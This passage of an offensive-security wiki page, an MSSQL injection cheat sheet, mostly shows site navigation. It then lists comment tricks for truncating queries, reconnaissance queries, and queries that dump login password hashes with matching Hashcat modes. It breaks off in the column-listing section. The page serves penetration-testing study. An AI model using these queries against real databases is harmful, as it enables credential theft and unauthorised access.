<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../Server%20Side%20Template%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
Server Side Template Injection
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_49" >
<label class="md-nav__link" for="__nav_49" id="__nav_49_label" tabindex="0">
<span class="md-ellipsis">
Tabnabbing
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_49_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_49">
<span class="md-nav__icon md-icon"></span>
Tabnabbing
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../Tabnabbing/" class="md-nav__link">
<span class="md-ellipsis">
Tabnabbing
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_50" >
<label class="md-nav__link" for="__nav_50" id="__nav_50_label" tabindex="0">
<span class="md-ellipsis">
Type Juggling
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_50_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_50">
<span class="md-nav__icon md-icon"></span>
Type Juggling
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../Type%20Juggling/" class="md-nav__link">
<span class="md-ellipsis">
Type Juggling
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_51" >
<label class="md-nav__link" for="__nav_51" id="__nav_51_label" tabindex="0">
<span class="md-ellipsis">
Upload Insecure Files
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_51_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_51">
<span class="md-nav__icon md-icon"></span>
Upload Insecure Files
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../Upload%20Insecure%20Files/" class="md-nav__link">
<span class="md-ellipsis">
Upload Insecure Files
</span>
</a>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_51_2" >
<label class="md-nav__link" for="__nav_51_2" id="__nav_51_2_label" tabindex="0">
<span class="md-ellipsis">
CVE Ffmpeg HLS
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="2" aria-labelledby="__nav_51_2_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_51_2">
<span class="md-nav__icon md-icon"></span>
CVE Ffmpeg HLS
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../Upload%20Insecure%20Files/CVE%20Ffmpeg%20HLS/" class="md-nav__link">
<span class="md-ellipsis">
FFmpeg HLS vulnerability
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_51_3" >
<label class="md-nav__link" for="__nav_51_3" id="__nav_51_3_label" tabindex="0">
<span class="md-ellipsis">
Configuration Apache .htaccess
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="2" aria-labelledby="__nav_51_3_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_51_3">
<span class="md-nav__icon md-icon"></span>
Configuration Apache .htaccess
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../Upload%20Insecure%20Files/Configuration%20Apache%20.htaccess/" class="md-nav__link">
<span class="md-ellipsis">
.htaccess upload
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_51_4" >
<label class="md-nav__link" for="__nav_51_4" id="__nav_51_4_label" tabindex="0">
<span class="md-ellipsis">
Configuration Busybox httpd.conf
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="2" aria-labelledby="__nav_51_4_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_51_4">
<span class="md-nav__icon md-icon"></span>
Configuration Busybox httpd.conf
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../Upload%20Insecure%20Files/Configuration%20Busybox%20httpd.conf/" class="md-nav__link">
<span class="md-ellipsis">
Index
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_51_5" >
<label class="md-nav__link" for="__nav_51_5" id="__nav_51_5_label" tabindex="0">
<span class="md-ellipsis">
Configuration uwsgi.ini
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="2" aria-labelledby="__nav_51_5_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_51_5">
<span class="md-nav__icon md-icon"></span>
Configuration uwsgi.ini
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../Upload%20Insecure%20Files/Configuration%20uwsgi.ini/" class="md-nav__link">
<span class="md-ellipsis">
uWSGI configuration file
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_51_6" >
<label class="md-nav__link" for="__nav_51_6" id="__nav_51_6_label" tabindex="0">
<span class="md-ellipsis">
Extension Flash
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="2" aria-labelledby="__nav_51_6_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_51_6">
<span class="md-nav__icon md-icon"></span>
Extension Flash
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../Upload%20Insecure%20Files/Extension%20Flash/" class="md-nav__link">
<span class="md-ellipsis">
Index
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_51_7" >
<label class="md-nav__link" for="__nav_51_7" id="__nav_51_7_label" tabindex="0">
<span class="md-ellipsis">
Extension PDF JS
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="2" aria-labelledby="__nav_51_7_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_51_7">
<span class="md-nav__icon md-icon"></span>
Extension PDF JS
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../Upload%20Insecure%20Files/Extension%20PDF%20JS/" class="md-nav__link">
<span class="md-ellipsis">
Generate PDF File Containing JavaScript Code
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_51_8" >
<label class="md-nav__link" for="__nav_51_8" id="__nav_51_8_label" tabindex="0">
<span class="md-ellipsis">
Picture ImageMagick
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="2" aria-labelledby="__nav_51_8_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_51_8">
<span class="md-nav__icon md-icon"></span>
Picture ImageMagick
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../Upload%20Insecure%20Files/Picture%20ImageMagick/" class="md-nav__link">
<span class="md-ellipsis">
ImageMagick Exploits
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_51_9" >
<label class="md-nav__link" for="__nav_51_9" id="__nav_51_9_label" tabindex="0">
<span class="md-ellipsis">
Zip Slip
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="2" aria-labelledby="__nav_51_9_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_51_9">
<span class="md-nav__icon md-icon"></span>
Zip Slip
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../Upload%20Insecure%20Files/Zip%20Slip/" class="md-nav__link">
<span class="md-ellipsis">
Zip Slip
</span>
</a>
</li>
</ul>
</nav>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_52" >
<label class="md-nav__link" for="__nav_52" id="__nav_52_label" tabindex="0">
<span class="md-ellipsis">
Web Cache Deception
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_52_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_52">
<span class="md-nav__icon md-icon"></span>
Web Cache Deception
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../Web%20Cache%20Deception/" class="md-nav__link">
<span class="md-ellipsis">
Web Cache Deception
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_53" >
<label class="md-nav__link" for="__nav_53" id="__nav_53_label" tabindex="0">
<span class="md-ellipsis">
Web Sockets
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_53_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_53">
<span class="md-nav__icon md-icon"></span>
Web Sockets
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../Web%20Sockets/" class="md-nav__link">
<span class="md-ellipsis">
Web Sockets
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_54" >
<label class="md-nav__link" for="__nav_54" id="__nav_54_label" tabindex="0">
<span class="md-ellipsis">
XPATH Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_54_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_54">
<span class="md-nav__icon md-icon"></span>
XPATH Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../XPATH%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
XPATH Injection
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_55" >
<label class="md-nav__link" for="__nav_55" id="__nav_55_label" tabindex="0">
<span class="md-ellipsis">
XSLT Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_55_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_55">
<span class="md-nav__icon md-icon"></span>
XSLT Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../XSLT%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
XSLT Injection
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_56" >
<label class="md-nav__link" for="__nav_56" id="__nav_56_label" tabindex="0">
<span class="md-ellipsis">
XSS Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_56_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_56">
<span class="md-nav__icon md-icon"></span>
XSS Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../XSS%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
Cross Site Scripting
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../XSS%20Injection/XSS%20in%20Angular/" class="md-nav__link">
<span class="md-ellipsis">
XSS in Angular and AngularJS
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../XSS%20Injection/XSS%20with%20Relative%20Path%20Overwrite/" class="md-nav__link">
<span class="md-ellipsis">
XSS with Relative Path Overwrite - IE 8/9 and lower
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_57" >
<label class="md-nav__link" for="__nav_57" id="__nav_57_label" tabindex="0">
<span class="md-ellipsis">
XXE Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_57_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_57">
<span class="md-nav__icon md-icon"></span>
XXE Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../XXE%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
XML External Entity
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_58" >
<label class="md-nav__link" for="__nav_58" id="__nav_58_label" tabindex="0">
<span class="md-ellipsis">
LEARNING AND SOCIALS
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_58_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_58">
<span class="md-nav__icon md-icon"></span>
LEARNING AND SOCIALS
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../_LEARNING_AND_SOCIALS/BOOKS/" class="md-nav__link">
<span class="md-ellipsis">
Books
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../_LEARNING_AND_SOCIALS/TWITTER/" class="md-nav__link">
<span class="md-ellipsis">
Twitter
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../_LEARNING_AND_SOCIALS/YOUTUBE/" class="md-nav__link">
<span class="md-ellipsis">
Youtube
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_59" >
<label class="md-nav__link" for="__nav_59" id="__nav_59_label" tabindex="0">
<span class="md-ellipsis">
template vuln
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_59_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_59">
<span class="md-nav__icon md-icon"></span>
template vuln
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../_template_vuln/" class="md-nav__link">
<span class="md-ellipsis">
Vulnerability Title
</span>
</a>
</li>
</ul>
</nav>
</li>
</ul>
</nav>
</div>
</div>
</div>
<div class="md-sidebar md-sidebar--secondary" data-md-component="sidebar" data-md-type="toc" >
<div class="md-sidebar__scrollwrap">
<div class="md-sidebar__inner">
<nav class="md-nav md-nav--secondary" aria-label="Table of contents">
<label class="md-nav__title" for="__toc">
<span class="md-nav__icon md-icon"></span>
Table of contents
</label>
<ul class="md-nav__list" data-md-component="toc" data-md-scrollfix>
<li class="md-nav__item">
<a href="#summary" class="md-nav__link">
<span class="md-ellipsis">
Summary
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#mssql-default-databases" class="md-nav__link">
<span class="md-ellipsis">
MSSQL Default Databases
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#mssql-comments" class="md-nav__link">
<span class="md-ellipsis">
MSSQL Comments
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#mssql-user" class="md-nav__link">
<span class="md-ellipsis">
MSSQL User
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#mssql-version" class="md-nav__link">
<span class="md-ellipsis">
MSSQL Version
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#mssql-hostname" class="md-nav__link">
<span class="md-ellipsis">
MSSQL Hostname
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#mssql-database-name" class="md-nav__link">
<span class="md-ellipsis">
MSSQL Database name
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#mssql-database-credentials" class="md-nav__link">
<span class="md-ellipsis">
MSSQL Database Credentials
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#mssql-list-databases" class="md-nav__link">
<span class="md-ellipsis">
MSSQL List databases
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#mssql-list-columns" class="md-nav__link">
<span class="md-ellipsis">
MSSQL List columns
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#mssql-list-tables" class="md-nav__link">
<span class="md-ellipsis">
MSSQL List tables
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#mssql-union-based" class="md-nav__link">
<span class="md-ellipsis">
MSSQL Union Based
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#mssql-error-based" class="md-nav__link">
<span class="md-ellipsis">
MSSQL Error based
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#mssql-blind-based" class="md-nav__link">
<span class="md-ellipsis">
MSSQL Blind based
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#mssql-time-based" class="md-nav__link">
<span class="md-ellipsis">
MSSQL Time based
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#mssql-stacked-query" class="md-nav__link">
<span class="md-ellipsis">
MSSQL Stacked Query
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#mssql-read-file" class="md-nav__link">
<span class="md-ellipsis">
MSSQL Read file
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#mssql-command-execution" class="md-nav__link">
<span class="md-ellipsis">
MSSQL Command execution
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#mssql-out-of-band" class="md-nav__link">
<span class="md-ellipsis">
MSSQL Out of band
</span>
</a>
<nav class="md-nav" aria-label="MSSQL Out of band">
<ul class="md-nav__list">
<li class="md-nav__item">
<a href="#mssql-dns-exfiltration" class="md-nav__link">
<span class="md-ellipsis">
MSSQL DNS exfiltration
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#mssql-unc-path" class="md-nav__link">
<span class="md-ellipsis">
MSSQL UNC Path
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item">
<a href="#mssql-make-user-dba-db-admin" class="md-nav__link">
<span class="md-ellipsis">
MSSQL Make user DBA (DB admin)
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#mssql-trusted-links" class="md-nav__link">
<span class="md-ellipsis">
MSSQL Trusted Links
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#list-permissions" class="md-nav__link">
<span class="md-ellipsis">
List permissions
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#mssql-opsec" class="md-nav__link">
<span class="md-ellipsis">
MSSQL OPSEC
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#references" class="md-nav__link">
<span class="md-ellipsis">
References
</span>
</a>
</li>
</ul>
</nav>
</div>
</div>
</div>
<div class="md-content" data-md-component="content">
<article class="md-content__inner md-typeset">
<h1 id="mssql-injection">MSSQL Injection</h1>
<h2 id="summary">Summary</h2>
<ul>
<li><a href="#mssql-default-databases">MSSQL Default Databases</a></li>
<li><a href="#mssql-comments">MSSQL Comments</a></li>
<li><a href="#mssql-user">MSSQL User</a></li>
<li><a href="#mssql-version">MSSQL Version</a></li>
<li><a href="#mssql-hostname">MSSQL Hostname</a></li>
<li><a href="#mssql-database-name">MSSQL Database Name</a></li>
<li><a href="#mssql-database-credentials">MSSQL Database Credentials</a></li>
<li><a href="#mssql-list-databases">MSSQL List databases</a></li>
<li><a href="#mssql-list-columns">MSSQL List columns</a></li>
<li><a href="#mssql-list-tables">MSSQL List tables</a></li>
<li><a href="#mssql-union-based">MSSQL Union Based</a></li>
<li><a href="#mssql-error-based">MSSQL Error Based</a></li>
<li><a href="#mssql-blind-based">MSSQL Blind Based</a></li>
<li><a href="#mssql-time-based">MSSQL Time Based</a></li>
<li><a href="#mssql-stacked-query">MSSQL Stacked query</a></li>
<li><a href="#mssql-read-file">MSSQL Read file</a></li>
<li><a href="#mssql-command-execution">MSSQL Command execution</a></li>
<li><a href="#mssql-out-of-band">MSSQL Out of band</a><ul>
<li><a href="#mssql-dns-exfiltration">MSSQL DNS exfiltration</a></li>
<li><a href="#mssql-unc-path">MSSQL UNC path</a></li>
</ul>
</li>
<li><a href="#mssql-make-user-dba-db-admin">MSSQL Make user DBA</a></li>
<li><a href="#mssql-trusted-links">MSSQL Trusted Links</a></li>
<li><a href="#mssql-list-permissions">MSSQL List permissions</a></li>
</ul>
<h2 id="mssql-default-databases">MSSQL Default Databases</h2>
<table>
<thead>
<tr>
<th>Name</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td>pubs</td>
<td>Not available on MSSQL 2005</td>
</tr>
<tr>
<td>model</td>
<td>Available in all versions</td>
</tr>
<tr>
<td>msdb</td>
<td>Available in all versions</td>
</tr>
<tr>
<td>tempdb</td>
<td>Available in all versions</td>
</tr>
<tr>
<td>northwind</td>
<td>Available in all versions</td>
</tr>
<tr>
<td>information_schema</td>
<td>Availalble from MSSQL 2000 and higher</td>
</tr>
</tbody>
</table>
<h2 id="mssql-comments">MSSQL Comments</h2>
<table>
<thead>
<tr>
<th>Type</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td><code>/* MSSQL Comment */</code></td>
<td>C-style comment</td>
</tr>
<tr>
<td><code>-- -</code></td>
<td>SQL comment</td>
</tr>
<tr>
<td><code>;%00</code></td>
<td>Null byte</td>
</tr>
</tbody>
</table>
<h2 id="mssql-user">MSSQL User</h2>
<div class="highlight"><pre><span></span><code><a id="__codelineno-0-1" name="__codelineno-0-1" href="#__codelineno-0-1"></a><span class="k">SELECT</span><span class="w"> </span><span class="k">CURRENT_USER</span>
<a id="__codelineno-0-2" name="__codelineno-0-2" href="#__codelineno-0-2"></a><span class="k">SELECT</span><span class="w"> </span><span class="n">user_name</span><span class="p">();</span>
<a id="__codelineno-0-3" name="__codelineno-0-3" href="#__codelineno-0-3"></a><span class="k">SELECT</span><span class="w"> </span><span class="k">system_user</span><span class="p">;</span>
<a id="__codelineno-0-4" name="__codelineno-0-4" href="#__codelineno-0-4"></a><span class="k">SELECT</span><span class="w"> </span><span class="k">user</span><span class="p">;</span>
</code></pre></div>
<h2 id="mssql-version">MSSQL Version</h2>
<div class="highlight"><pre><span></span><code><a id="__codelineno-1-1" name="__codelineno-1-1" href="#__codelineno-1-1"></a><span class="k">SELECT</span><span class="w"> </span><span class="o">@@</span><span class="k">version</span>
</code></pre></div>
<h2 id="mssql-hostname">MSSQL Hostname</h2>
<div class="highlight"><pre><span></span><code><a id="__codelineno-2-1" name="__codelineno-2-1" href="#__codelineno-2-1"></a><span class="k">SELECT</span><span class="w"> </span><span class="n">HOST_NAME</span><span class="p">()</span>
<a id="__codelineno-2-2" name="__codelineno-2-2" href="#__codelineno-2-2"></a><span class="k">SELECT</span><span class="w"> </span><span class="o">@@</span><span class="n">hostname</span>
<a id="__codelineno-2-3" name="__codelineno-2-3" href="#__codelineno-2-3"></a><span class="k">SELECT</span><span class="w"> </span><span class="o">@@</span><span class="n">SERVERNAME</span>
<a id="__codelineno-2-4" name="__codelineno-2-4" href="#__codelineno-2-4"></a><span class="k">SELECT</span><span class="w"> </span><span class="n">SERVERPROPERTY</span><span class="p">(</span><span class="s1">&#39;productversion&#39;</span><span class="p">)</span>
<a id="__codelineno-2-5" name="__codelineno-2-5" href="#__codelineno-2-5"></a><span class="k">SELECT</span><span class="w"> </span><span class="n">SERVERPROPERTY</span><span class="p">(</span><span class="s1">&#39;productlevel&#39;</span><span class="p">)</span>
<a id="__codelineno-2-6" name="__codelineno-2-6" href="#__codelineno-2-6"></a><span class="k">SELECT</span><span class="w"> </span><span class="n">SERVERPROPERTY</span><span class="p">(</span><span class="s1">&#39;edition&#39;</span><span class="p">);</span>
</code></pre></div>
<h2 id="mssql-database-name">MSSQL Database name</h2>
<div class="highlight"><pre><span></span><code><a id="__codelineno-3-1" name="__codelineno-3-1" href="#__codelineno-3-1"></a><span class="k">SELECT</span><span class="w"> </span><span class="n">DB_NAME</span><span class="p">()</span>
</code></pre></div>
<h2 id="mssql-database-credentials">MSSQL Database Credentials</h2>
<ul>
<li><strong>MSSQL 2000</strong>: Hashcat mode 131: <code>0x01002702560500000000000000000000000000000000000000008db43dd9b1972a636ad0c7d4b8c515cb8ce46578</code>
<div class="highlight"><pre><span></span><code><a id="__codelineno-4-1" name="__codelineno-4-1" href="#__codelineno-4-1"></a><span class="k">SELECT</span><span class="w"> </span><span class="n">name</span><span class="p">,</span><span class="w"> </span><span class="n">password</span><span class="w"> </span><span class="k">FROM</span><span class="w"> </span><span class="n">master</span><span class="p">..</span><span class="n">sysxlogins</span>
<a id="__codelineno-4-2" name="__codelineno-4-2" href="#__codelineno-4-2"></a><span class="k">SELECT</span><span class="w"> </span><span class="n">name</span><span class="p">,</span><span class="w"> </span><span class="n">master</span><span class="p">.</span><span class="n">dbo</span><span class="p">.</span><span class="n">fn_varbintohexstr</span><span class="p">(</span><span class="n">password</span><span class="p">)</span><span class="w"> </span><span class="k">FROM</span><span class="w"> </span><span class="n">master</span><span class="p">..</span><span class="n">sysxlogins</span><span class="w"> </span>
<a id="__codelineno-4-3" name="__codelineno-4-3" href="#__codelineno-4-3"></a><span class="c1">-- Need to convert to hex to return hashes in MSSQL error message / some version of query analyzer</span>
</code></pre></div></li>
<li><strong>MSSQL 2005</strong>: Hashcat mode 132: <code>0x010018102152f8f28c8499d8ef263c53f8be369d799f931b2fbe</code>
<div class="highlight"><pre><span></span><code><a id="__codelineno-5-1" name="__codelineno-5-1" href="#__codelineno-5-1"></a><span class="k">SELECT</span><span class="w"> </span><span class="n">name</span><span class="p">,</span><span class="w"> </span><span class="n">password_hash</span><span class="w"> </span><span class="k">FROM</span><span class="w"> </span><span class="n">master</span><span class="p">.</span><span class="n">sys</span><span class="p">.</span><span class="n">sql_logins</span>
<a id="__codelineno-5-2" name="__codelineno-5-2" href="#__codelineno-5-2"></a><span class="k">SELECT</span><span class="w"> </span><span class="n">name</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="s1">&#39;-&#39;</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="n">master</span><span class="p">.</span><span class="n">sys</span><span class="p">.</span><span class="n">fn_varbintohexstr</span><span class="p">(</span><span class="n">password_hash</span><span class="p">)</span><span class="w"> </span><span class="k">from</span><span class="w"> </span><span class="n">master</span><span class="p">.</span><span class="n">sys</span><span class="p">.</span><span class="n">sql_logins</span>
</code></pre></div></li>
</ul>
<h2 id="mssql-list-databases">MSSQL List databases</h2>
<div class="highlight"><pre><span></span><code><a id="__codelineno-6-1" name="__codelineno-6-1" href="#__codelineno-6-1"></a><span class="k">SELECT</span><span class="w"> </span><span class="n">name</span><span class="w"> </span><span class="k">FROM</span><span class="w"> </span><span class="n">master</span><span class="p">..</span><span class="n">sysdatabases</span><span class="p">;</span>
<a id="__codelineno-6-2" name="__codelineno-6-2" href="#__codelineno-6-2"></a><span class="k">SELECT</span><span class="w"> </span><span class="n">DB_NAME</span><span class="p">(</span><span class="n">N</span><span class="p">);</span><span class="w"> </span><span class="err"></span><span class="w"> </span><span class="k">for</span><span class="w"> </span><span class="n">N</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mi">0</span><span class="p">,</span><span class="w"> </span><span class="mi">1</span><span class="p">,</span><span class="w"> </span><span class="mi">2</span><span class="p">,</span><span class="w"> </span><span class="err"></span>
<a id="__codelineno-6-3" name="__codelineno-6-3" href="#__codelineno-6-3"></a><span class="k">SELECT</span><span class="w"> </span><span class="n">STRING_AGG</span><span class="p">(</span><span class="n">name</span><span class="p">,</span><span class="w"> </span><span class="s1">&#39;, &#39;</span><span class="p">)</span><span class="w"> </span><span class="k">FROM</span><span class="w"> </span><span class="n">master</span><span class="p">..</span><span class="n">sysdatabases</span><span class="p">;</span><span class="w"> </span><span class="c1">-- Change delimeter value such as &#39;, &#39; to anything else you want =&gt; master, tempdb, model, msdb (Only works in MSSQL 2017+)</span>
</code></pre></div>
<h2 id="mssql-list-columns">MSSQL List columns</h2>
<div class="highlight"><pre><span></span><code><a id="__codelineno-7-1" name="__codelineno-7-1" href="#__codelineno-7-1"></a><span class="k">SELECT</span><span class="w"> </span><span class="n">name</span><span class="w"> </span><span class="k">FROM</span><span class="w"> </span><span class="n">syscolumns</span><span class="w"> </span><span class="k">WHERE</span><span class="w"> </span><span class="n">id</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">(</span><span class="k">SELECT</span><span class="w"> </span><span class="n">id</span><span class="w"> </span><span class="k">FROM</span><span class="w"> </span><span class="n">sysobjects</span><span class="w"> </span><span class="k">WHERE</span><span class="w"> </span><span class="n">name</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="err"></span><span class="n">mytable</span><span class="err"></span><span class="p">);</span><span class="w"> </span><span class="err"></span><span class="w"> </span><span class="k">for</span><span class="w"> </span><span class="n">the</span><span class="w"> </span><span class="k">current</span><span class="w"> </span><span class="n">DB</span><span class="w"> </span><span class="k">only</span>
